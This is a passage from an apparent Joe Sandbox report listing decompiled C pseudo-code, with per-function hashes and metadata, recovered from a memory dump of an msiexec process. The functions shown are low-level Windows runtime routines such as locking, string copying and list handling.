                              							_t115 =  &(( *_t119)[_t111 + 1]);
                              							_t33 =  &(_t119[1]); // 0x100
                              							_t120 = _a8;
                              							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                              							_t35 = _t95 - 1; // 0xff
                              							_t124 = _t35;
                              							if(_t120 == 0) {
                              								L27:
                              								 *_a16 = _t95;
                              								_t56 = 0xc0000023;
                              								goto L16;
                              							}
                              							if(_t124 >= _a12) {
                              								if(_a12 >= 1) {
                              									 *_t120 = 0;
                              								}
                              								goto L27;
                              							}
                              							 *_a16 = _t124;
                              							_t125 = _t124 + _t124;
                              							E04D4F3E0(_t120, _t115, _t125);
                              							_t56 = 0;
                              							 *((short*)(_t125 + _t120)) = 0;
                              							goto L16;
                              						}
                              						_t119 =  &(_t119[2]);
                              						if(_t119 < _v24) {
                              							L2:
                              							_t91 =  *_t119;
                              							_t61 = _t91;
                              							_v12 = _t61;
                              							_t112 =  &(_t61[_t111]);
                              							_v8 = _t112;
                              							if(_t61 >= _t112) {
                              								break;
                              							} else {
                              								_t127 = _v16 - _t91;
                              								_t96 = _t112;
                              								_v20 = _t127;
                              								_t116 =  *_t61 & 0x0000ffff;
                              								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                              								if(_t116 == _t128) {
                              									goto L18;
                              								}
                              								goto L5;
                              							}
                              						} else {
                              							_t90 = _v28;
                              							_t57 = _v32;
                              							_t123 = _v36;
                              							goto L12;
                              						}
                              					}
                              					L18:
                              					_t61 =  &(_t61[1]);
                              					_v12 = _t61;
                              					if(_t61 >= _t96) {
                              						break;
                              					}
                              					_t127 = _v20;
                              				}
                              				_t113 = 0;
                              				goto L9;
                              			}







































                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b6289253c085e2db05a74a652c07397146b8ab366f6504e8a2ce54b54ddc457
                              • Instruction ID: 61353d80c889f7cc0cd422f2ca23dc58552f7a2bf8d27d156972ec9d5636fc13
                              • Opcode Fuzzy Hash: 6b6289253c085e2db05a74a652c07397146b8ab366f6504e8a2ce54b54ddc457
                              • Instruction Fuzzy Hash: 51518E76F001258BCB24DF18C8909BDB7B1FB8870271584DAE8969B328E734FE51DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E04DCAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                              				signed int _v8;
                              				signed int _v12;
                              				void* __esi;
                              				void* __ebp;
                              				signed short* _t36;
                              				signed int _t41;
                              				char* _t42;
                              				intOrPtr _t43;
                              				signed int _t47;
                              				void* _t52;
                              				signed int _t57;
                              				intOrPtr _t61;
                              				signed char _t62;
                              				signed int _t72;
                              				signed char _t85;
                              				signed int _t88;
                              
                              				_t73 = __edx;
                              				_push(__ecx);
                              				_t85 = __ecx;
                              				_v8 = __edx;
                              				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                              				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                              				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                              					_t57 = _t57 | 0x00000001;
                              				}
                              				_t88 = 0;
                              				_t36 = 0;
                              				_t96 = _a12;
                              				if(_a12 == 0) {
                              					_t62 = _a8;
                              					__eflags = _t62;
                              					if(__eflags == 0) {
                              						goto L12;
                              					}
                              					_t52 = E04DCC38B(_t85, _t73, _t57, 0);
                              					_t62 = _a8;
                              					 *_t62 = _t52;
                              					_t36 = 0;
                              					goto L11;
                              				} else {
                              					_t36 = E04DCACFD(_t85, _t73, _t96, _t57, _a8);
                              					if(0 == 0 || 0 == 0xffffffff) {
                              						_t72 = _t88;
                              					} else {
                              						_t72 =  *0x00000000 & 0x0000ffff;
                              					}
                              					 *_a12 = _t72;
                              					_t62 = _a8;
                              					L11:
                              					_t73 = _v8;
                              					L12:
                              					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                              						L19:
                              						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                              							L22:
                              							_t74 = _v8;
                              							__eflags = _v8;
                              							if(__eflags != 0) {
                              								L25:
                              								__eflags = _t88 - 2;
                              								if(_t88 != 2) {
                              									__eflags = _t85 + 0x44 + (_t88 << 6);
                              									_t88 = E04DCFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                              									goto L34;
                              								}
                              								L26:
                              								_t59 = _v8;
                              								E04DCEA55(_t85, _v8, _t57);
                              								asm("sbb esi, esi");
                              								_t88 =  ~_t88;
                              								_t41 = E04D27D50();
                              								__eflags = _t41;
                              								if(_t41 == 0) {
                              									_t42 = 0x7ffe0380;
                              								} else {
                              									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              								}
                              								__eflags =  *_t42;
                              								if( *_t42 != 0) {
                              									_t43 =  *[fs:0x30];
                              									__eflags =  *(_t43 + 0x240) & 0x00000001;
                              									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                              										__eflags = _t88;
                              										if(_t88 != 0) {
                              											E04DC1608(_t85, _t59, 3);
                              										}
                              									}
                              								}
                              								goto L34;
                              							}
                              							_push(_t62);
                              							_t47 = E04DD1536(0x4df8ae4, (_t74 -  *0x4df8b04 >> 0x14) + (_t74 -  *0x4df8b04 >> 0x14), _t88, __eflags);
                              							__eflags = _t47;
                              							if(_t47 == 0) {
                              								goto L26;
                              							}
                              							_t74 = _v12;
                              							_t27 = _t47 - 1; // -1
                              							_t88 = _t27;
                              							goto L25;
                              						}
                              						_t62 = _t85;
                              						if(L04DCC323(_t62, _v8, _t57) != 0xffffffff) {
                              							goto L22;
                              						}
                              						_push(_t62);
                              						_push(_t88);
                              						E04DCA80D(_t85, 9, _v8, _t88);
                              						goto L34;
                              					} else {
                              						_t101 = _t36;
                              						if(_t36 != 0) {
                              							L16:
                              							if(_t36 == 0xffffffff) {
                              								goto L19;
                              							}
                              							_t62 =  *((intOrPtr*)(_t36 + 2));
                              							if((_t62 & 0x0000000f) == 0) {
                              								goto L19;
                              							}
                              							_t62 = _t62 & 0xf;
                              							if(E04DACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                              								L34:
                              								return _t88;
                              							}
                              							goto L19;
                              						}
                              						_t62 = _t85;
                              						_t36 = E04DCACFD(_t62, _t73, _t101, _t57, _t62);
                              						if(_t36 == 0) {
                              							goto L19;
                              						}
                              						goto L16;
                              					}
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf638e05798cdeee3e79d1a0d44271cfc89df6a55c1a0b55ea663fd29bf52dae
                              • Instruction ID: d20f4711b9082ffa91b9406ef46b0c219d691265d34b8cca3edb33c00a96f963
                              • Opcode Fuzzy Hash: cf638e05798cdeee3e79d1a0d44271cfc89df6a55c1a0b55ea663fd29bf52dae
                              • Instruction Fuzzy Hash: 6941C1B170061B9BDB269F29C894B7BB79AFF84724F04421EF85687390DB74F801D6A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E04D2DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				char _v5;
                              				signed int _v12;
                              				signed int* _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				intOrPtr _v44;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t54;
                              				char* _t58;
                              				signed int _t66;
                              				intOrPtr _t67;
                              				intOrPtr _t68;
                              				intOrPtr _t72;
                              				intOrPtr _t73;
                              				signed int* _t75;
                              				intOrPtr _t79;
                              				intOrPtr _t80;
                              				char _t82;
                              				signed int _t83;
                              				signed int _t84;
                              				signed int _t88;
                              				signed int _t89;
                              				intOrPtr _t90;
                              				intOrPtr _t92;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				intOrPtr* _t99;
                              				signed int* _t101;
                              				signed int* _t102;
                              				intOrPtr* _t103;
                              				intOrPtr _t105;
                              				signed int _t106;
                              				void* _t118;
                              
                              				_t92 = __edx;
                              				_t75 = _a4;
                              				_t98 = __ecx;
                              				_v44 = __edx;
                              				_t106 = _t75[1];
                              				_v40 = __ecx;
                              				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                              					_t82 = 0;
                              				} else {
                              					_t82 = 1;
                              				}
                              				_v5 = _t82;
                              				_t6 = _t98 + 0xc8; // 0xc9
                              				_t101 = _t6;
                              				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                              				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                              				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                              				if(_t82 != 0) {
                              					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                              					_t83 =  *_t75;
                              					_t54 = _t75[1];
                              					 *_t101 = _t83;
                              					_t84 = _t83 | _t54;
                              					_t101[1] = _t54;
                              					if(_t84 == 0) {
                              						_t101[1] = _t101[1] & _t84;
                              						 *_t101 = 1;
                              					}
                              					goto L19;
                              				} else {
                              					if(_t101 == 0) {
                              						E04D0CC50(E04D04510(0xc000000d));
                              						_t88 =  *_t101;
                              						_t97 = _t101[1];
                              						L15:
                              						_v12 = _t88;
                              						_t66 = _t88 -  *_t75;
                              						_t89 = _t97;
                              						asm("sbb ecx, [ebx+0x4]");
                              						_t118 = _t89 - _t97;
                              						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                              							_t66 = _t66 | 0xffffffff;
                              							_t89 = 0x7fffffff;
                              						}
                              						 *_t101 = _t66;
                              						_t101[1] = _t89;
                              						L19:
                              						if(E04D27D50() != 0) {
                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t58 = 0x7ffe0386;
                              						}
                              						_t102 = _v16;
                              						if( *_t58 != 0) {
                              							_t58 = E04DD8ED6(_t102, _t98);
                              						}
                              						_t76 = _v44;
                              						E04D22280(_t58, _v44);
                              						E04D2DD82(_v44, _t102, _t98);
                              						E04D2B944(_t102, _v5);
                              						return E04D1FFB0(_t76, _t98, _t76);
                              					}
                              					_t99 = 0x7ffe03b0;
                              					do {
                              						_t103 = 0x7ffe0010;
                              						do {
                              							_t67 =  *0x4df8628; // 0x0
                              							_v28 = _t67;
                              							_t68 =  *0x4df862c; // 0x0
                              							_v32 = _t68;
                              							_v24 =  *((intOrPtr*)(_t99 + 4));
                              							_v20 =  *_t99;
                              							while(1) {
                              								_t97 =  *0x7ffe000c;
                              								_t90 =  *0x7FFE0008;
                              								if(_t97 ==  *_t103) {
                              									goto L10;
                              								}
                              								asm("pause");
                              							}
                              							L10:
                              							_t79 = _v24;
                              							_t99 = 0x7ffe03b0;
                              							_v12 =  *0x7ffe03b0;
                              							_t72 =  *0x7FFE03B4;
                              							_t103 = 0x7ffe0010;
                              							_v36 = _t72;
                              						} while (_v20 != _v12 || _t79 != _t72);
                              						_t73 =  *0x4df8628; // 0x0
                              						_t105 = _v28;
                              						_t80 =  *0x4df862c; // 0x0
                              					} while (_t105 != _t73 || _v32 != _t80);
                              					_t98 = _v40;
                              					asm("sbb edx, [ebp-0x20]");
                              					_t88 = _t90 - _v12 - _t105;
                              					_t75 = _a4;
                              					asm("sbb edx, eax");
                              					_t31 = _t98 + 0xc8; // 0x4dcfb53
                              					_t101 = _t31;
                              					 *_t101 = _t88;
                              					_t101[1] = _t97;
                              					goto L15;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f387024ff2d8976cfb958bf192daaab297f43555890558344eb6bcc43252747
                              • Instruction ID: b168101358863209ad81c19dadd68e019785532fa97e4c5488516c8becd52988
                              • Opcode Fuzzy Hash: 3f387024ff2d8976cfb958bf192daaab297f43555890558344eb6bcc43252747
                              • Instruction Fuzzy Hash: 38518B71A00625DFCB14DF68C690AAEFBF2FB58318F20855AD955A7340EB70F944CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E04D1EF40(intOrPtr __ecx) {
                              				char _v5;
                              				char _v6;
                              				char _v7;
                              				char _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t58;
                              				char _t59;
                              				signed char _t69;
                              				void* _t73;
                              				signed int _t74;
                              				char _t79;
                              				signed char _t81;
                              				signed int _t85;
                              				signed int _t87;
                              				intOrPtr _t90;
                              				signed char* _t91;
                              				void* _t92;
                              				signed int _t94;
                              				void* _t96;
                              
                              				_t90 = __ecx;
                              				_v16 = __ecx;
                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                              					_t58 =  *((intOrPtr*)(__ecx));
                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                              						E04D09080(_t73, __ecx, __ecx, _t92);
                              					}
                              				}
                              				_t74 = 0;
                              				_t96 =  *0x7ffe036a - 1;
                              				_v12 = 0;
                              				_v7 = 0;
                              				if(_t96 > 0) {
                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                              					_v12 = _t74;
                              					_v7 = _t96 != 0;
                              				}
                              				_t79 = 0;
                              				_v8 = 0;
                              				_v5 = 0;
                              				while(1) {
                              					L4:
                              					_t59 = 1;
                              					L5:
                              					while(1) {
                              						if(_t59 == 0) {
                              							L12:
                              							_t21 = _t90 + 4; // 0x770bc21e
                              							_t87 =  *_t21;
                              							_v6 = 0;
                              							if(_t79 != 0) {
                              								if((_t87 & 0x00000002) != 0) {
                              									goto L19;
                              								}
                              								if((_t87 & 0x00000001) != 0) {
                              									_v6 = 1;
                              									_t74 = _t87 ^ 0x00000003;
                              								} else {
                              									_t51 = _t87 - 2; // -2
                              									_t74 = _t51;
                              								}
                              								goto L15;
                              							} else {
                              								if((_t87 & 0x00000001) != 0) {
                              									_v6 = 1;
                              									_t74 = _t87 ^ 0x00000001;
                              								} else {
                              									_t26 = _t87 - 4; // -4
                              									_t74 = _t26;
                              									if((_t74 & 0x00000002) == 0) {
                              										_t74 = _t74 - 2;
                              									}
                              								}
                              								L15:
                              								if(_t74 == _t87) {
                              									L19:
                              									E04D02D8A(_t74, _t90, _t87, _t90);
                              									_t74 = _v12;
                              									_v8 = 1;
                              									if(_v7 != 0 && _t74 > 0x64) {
                              										_t74 = _t74 - 1;
                              										_v12 = _t74;
                              									}
                              									_t79 = _v5;
                              									goto L4;
                              								}
                              								asm("lock cmpxchg [esi], ecx");
                              								if(_t87 != _t87) {
                              									_t74 = _v12;
                              									_t59 = 0;
                              									_t79 = _v5;
                              									continue;
                              								}
                              								if(_v6 != 0) {
                              									_t74 = _v12;
                              									L25:
                              									if(_v7 != 0) {
                              										if(_t74 < 0x7d0) {
                              											if(_v8 == 0) {
                              												_t74 = _t74 + 1;
                              											}
                              										}
                              										_t38 = _t90 + 0x14; // 0x0
                              										_t39 = _t90 + 0x14; // 0x0
                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                              											_t85 = _t85 & 0xff000000;
                              										}
                              										 *(_t90 + 0x14) = _t85;
                              									}
                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                              									return 0;
                              								}
                              								_v5 = 1;
                              								_t87 = _t74;
                              								goto L19;
                              							}
                              						}
                              						_t94 = _t74;
                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                              						if(_t74 == 0) {
                              							goto L12;
                              						} else {
                              							_t91 = _t90 + 4;
                              							goto L8;
                              							L9:
                              							while((_t81 & 0x00000001) != 0) {
                              								_t69 = _t81;
                              								asm("lock cmpxchg [edi], edx");
                              								if(_t69 != _t81) {
                              									_t81 = _t69;
                              									continue;
                              								}
                              								_t90 = _v16;
                              								goto L25;
                              							}
                              							asm("pause");
                              							_t94 = _t94 - 1;
                              							if(_t94 != 0) {
                              								L8:
                              								_t81 =  *_t91;
                              								goto L9;
                              							} else {
                              								_t90 = _v16;
                              								_t79 = _v5;
                              								goto L12;
                              							}
                              						}
                              					}
                              				}
                              			}
                              0x04d1f0a0
                              0x04d1f0a0
                              0x04d1f09e
                              0x04d1f053
                              0x04d1f064
                              0x04d1f064
                              0x04d1f06b
                              0x04d6bb1a
                              0x04d6bb1a
                              0x04d1f071
                              0x04d1f071
                              0x04d1f07d
                              0x04d1f082
                              0x04d1f08f
                              0x04d1f08f
                              0x04d1f009
                              0x04d1f00d
                              0x00000000
                              0x04d1f00d
                              0x04d1efd0
                              0x04d1ef97
                              0x04d1efa5
                              0x04d1efaa
                              0x00000000
                              0x04d1efac
                              0x04d1efac
                              0x04d1efac
                              0x00000000
                              0x04d1efb2
                              0x04d1f036
                              0x04d1f03a
                              0x04d1f040
                              0x04d1f090
                              0x00000000
                              0x04d1f092
                              0x04d1f042
                              0x00000000
                              0x04d1f042
                              0x04d1efb7
                              0x04d1efb9
                              0x04d1efbc
                              0x04d1efb0
                              0x04d1efb0
                              0x00000000
                              0x04d1efbe
                              0x04d1efbe
                              0x04d1efc1
                              0x00000000
                              0x04d1efc1
                              0x04d1efbc
                              0x04d1efaa
                              0x04d1ef91

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction ID: dd612bb6ed581db3b5abc4636981604fa7d56e6c23598aa853ab2cc951648081
                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction Fuzzy Hash: 0E51C130B04249AFDB24CF68E0907AEBBB1BF05314F1881AEDD85972A1D375B989D791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E04DD740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                              				signed short* _v8;
                              				intOrPtr _v12;
                              				intOrPtr _t55;
                              				void* _t56;
                              				intOrPtr* _t66;
                              				intOrPtr* _t69;
                              				void* _t74;
                              				intOrPtr* _t78;
                              				intOrPtr* _t81;
                              				intOrPtr* _t82;
                              				intOrPtr _t83;
                              				signed short* _t84;
                              				intOrPtr _t85;
                              				signed int _t87;
                              				intOrPtr* _t90;
                              				intOrPtr* _t93;
                              				intOrPtr* _t94;
                              				void* _t98;
                              
                              				_t84 = __edx;
                              				_t80 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t55 = __ecx;
                              				_v8 = __edx;
                              				_t87 =  *__edx & 0x0000ffff;
                              				_v12 = __ecx;
                              				_t3 = _t55 + 0x154; // 0x154
                              				_t93 = _t3;
                              				_t78 =  *_t93;
                              				_t4 = _t87 + 2; // 0x2
                              				_t56 = _t4;
                              				while(_t78 != _t93) {
                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                              						L4:
                              						_t78 =  *_t78;
                              						continue;
                              					} else {
                              						_t7 = _t78 + 0x18; // 0x18
                              						if(E04D5D4F0(_t7, _t84[2], _t87) == _t87) {
                              							_t40 = _t78 + 0xc; // 0xc
                              							_t94 = _t40;
                              							_t90 =  *_t94;
                              							while(_t90 != _t94) {
                              								_t41 = _t90 + 8; // 0x8
                              								_t74 = E04D4F380(_a4, _t41, 0x10);
                              								_t98 = _t98 + 0xc;
                              								if(_t74 != 0) {
                              									_t90 =  *_t90;
                              									continue;
                              								}
                              								goto L12;
                              							}
                              							_t82 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                              							if(_t82 != 0) {
                              								_t46 = _t78 + 0xc; // 0xc
                              								_t69 = _t46;
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								_t85 =  *_t69;
                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              									L20:
                              									_t82 = 3;
                              									asm("int 0x29");
                              								}
                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                              								 *_t82 = _t85;
                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                              								 *_t69 = _t82;
                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                              								goto L11;
                              							} else {
                              								L18:
                              								_push(0xe);
                              								_pop(0);
                              							}
                              						} else {
                              							_t84 = _v8;
                              							_t9 = _t87 + 2; // 0x2
                              							_t56 = _t9;
                              							goto L4;
                              						}
                              					}
                              					L12:
                              					return 0;
                              				}
                              				_t10 = _t87 + 0x1a; // 0x1a
                              				_t78 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                              				if(_t78 == 0) {
                              					goto L18;
                              				} else {
                              					_t12 = _t87 + 2; // 0x2
                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                              					_t16 = _t78 + 0x18; // 0x18
                              					E04D4F3E0(_t16, _v8[2], _t87);
                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                              					_t19 = _t78 + 0xc; // 0xc
                              					_t66 = _t19;
                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                              					 *_t66 = _t66;
                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                              					_t81 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                              					if(_t81 == 0) {
                              						goto L18;
                              					} else {
                              						_t26 = _t78 + 0xc; // 0xc
                              						_t69 = _t26;
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						_t85 =  *_t69;
                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              							goto L20;
                              						} else {
                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                              							 *_t81 = _t85;
                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                              							 *_t69 = _t81;
                              							_t83 = _v12;
                              							 *(_t78 + 8) = 1;
                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                              							_t34 = _t83 + 0x154; // 0x1ba
                              							_t69 = _t34;
                              							_t85 =  *_t69;
                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              								goto L20;
                              							} else {
                              								 *_t78 = _t85;
                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                              								 *_t69 = _t78;
                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                              							}
                              						}
                              						goto L11;
                              					}
                              				}
                              				goto L12;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction ID: 77b93ae88ce4a75bb9d9ebcbb529484ace06b1b6641c8dbcfaee4bdbe4bab157
                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction Fuzzy Hash: 33518C71600606EFDB16CF54C584A96BBB5FF45308F14C0AAE9089F266E371FA46CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E04D32990() {
                              				signed int* _t62;
                              				signed int _t64;
                              				intOrPtr _t66;
                              				signed short* _t69;
                              				intOrPtr _t76;
                              				signed short* _t79;
                              				void* _t81;
                              				signed int _t82;
                              				signed short* _t83;
                              				signed int _t87;
                              				intOrPtr _t91;
                              				void* _t98;
                              				signed int _t99;
                              				void* _t101;
                              				signed int* _t102;
                              				void* _t103;
                              				void* _t104;
                              				void* _t107;
                              
                              				_push(0x20);
                              				_push(0x4ddff00);
                              				E04D5D08C(_t81, _t98, _t101);
                              				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                              				_t99 = 0;
                              				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                              				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                              				if(_t82 == 0) {
                              					_t62 = 0xc0000100;
                              				} else {
                              					 *((intOrPtr*)(_t103 - 4)) = 0;
                              					_t102 = 0xc0000100;
                              					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                              					_t64 = 4;
                              					while(1) {
                              						 *(_t103 - 0x24) = _t64;
                              						if(_t64 == 0) {
                              							break;
                              						}
                              						_t87 = _t64 * 0xc;
                              						 *(_t103 - 0x2c) = _t87;
                              						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4ce1664));
                              						if(_t107 <= 0) {
                              							if(_t107 == 0) {
                              								_t79 = E04D4E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4ce1668)), _t82);
                              								_t104 = _t104 + 0xc;
                              								__eflags = _t79;
                              								if(__eflags == 0) {
                              									_t102 = E04D851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4ce166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                              									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                              									break;
                              								} else {
                              									_t64 =  *(_t103 - 0x24);
                              									goto L5;
                              								}
                              								goto L13;
                              							} else {
                              								L5:
                              								_t64 = _t64 - 1;
                              								continue;
                              							}
                              						}
                              						break;
                              					}
                              					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              					__eflags = _t102;
                              					if(_t102 < 0) {
                              						__eflags = _t102 - 0xc0000100;
                              						if(_t102 == 0xc0000100) {
                              							_t83 =  *((intOrPtr*)(_t103 + 8));
                              							__eflags = _t83;
                              							if(_t83 != 0) {
                              								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                              								__eflags =  *_t83 - _t99;
                              								if( *_t83 == _t99) {
                              									_t102 = 0xc0000100;
                              									goto L19;
                              								} else {
                              									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                              									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                              									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                              									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                              										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                              										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                              											L26:
                              											_t102 = E04D32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                              											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              											__eflags = _t102 - 0xc0000100;
                              											if(_t102 != 0xc0000100) {
                              												goto L12;
                              											} else {
                              												_t99 = 1;
                              												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                              												goto L18;
                              											}
                              										} else {
                              											_t69 = E04D16600( *((intOrPtr*)(_t91 + 0x1c)));
                              											__eflags = _t69;
                              											if(_t69 != 0) {
                              												goto L26;
                              											} else {
                              												_t83 =  *((intOrPtr*)(_t103 + 8));
                              												goto L18;
                              											}
                              										}
